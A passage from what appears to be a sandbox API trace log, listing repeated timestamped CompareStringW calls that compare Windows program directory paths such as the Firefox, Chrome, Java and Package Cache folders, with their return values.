Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\", cchCount2=49) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\", cchCount2=49) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\", cchCount2=49) returned 3 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount2=56) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount2=56) returned 3 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount2=56) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount2=56) returned 2 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\", cchCount2=49) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\", cchCount2=49) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\", cchCount1=53, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\", cchCount2=49) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\", cchCount2=49) returned 3 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount2=36) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount2=36) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\", cchCount1=49, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount2=36) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount1=51, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount2=36) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\", cchCount2=49) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\", cchCount1=53, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\", cchCount2=49) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\", cchCount2=49) returned 3 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\", cchCount1=49, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\", cchCount2=49) returned 2 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\", cchCount1=102, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount1=58, lpString2="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=114) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\", cchCount1=53, lpString2="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=114) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount1=51, lpString2="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=114) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount1=36, lpString2="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=114) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\", cchCount1=102, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=74) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\", cchCount1=49, lpString2="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=74) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount1=36, lpString2="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=74) returned 3 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=74) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=74) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=74) returned 1 [0219.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount1=36, lpString2="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=74) returned 3 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount1=74, lpString2="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=74) returned 2 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=51) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount1=51, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=51) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount1=36, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=51) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=51) returned 3 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\", cchCount2=45) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount1=51, lpString2="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\", cchCount2=45) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount1=36, lpString2="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\", cchCount2=45) returned 3 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount1=74, lpString2="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\", cchCount2=45) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=51) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount1=74, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=51) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount1=36, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=51) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=51) returned 2 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchCount2=68) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount1=74, lpString2="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchCount2=68) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount1=36, lpString2="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchCount2=68) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchCount2=68) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchCount2=68) returned 3 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount2=51) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount2=51) returned 3 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\", cchCount1=49, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount2=51) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount2=51) returned 2 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\", cchCount2=75) returned 3 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\", cchCount2=75) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\", cchCount2=75) returned 3 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\", cchCount1=102, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\", cchCount2=75) returned 3 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=68) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\", cchCount1=45, lpString2="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=68) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=68) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=68) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=68) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount2=68) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\", cchCount1=45, lpString2="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount2=68) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount2=68) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount2=68) returned 1 [0219.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount2=68) returned 3 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\", cchCount1=53, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount2=47) returned 3 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\", cchCount1=75, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount2=47) returned 1 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount2=47) returned 3 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\", cchCount1=102, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount2=47) returned 1 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount2=47) returned 1 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount1=36, lpString2="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\", cchCount1=53, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\", cchCount1=102, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 1 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0219.656] CompareStringW (Locale=0x400, 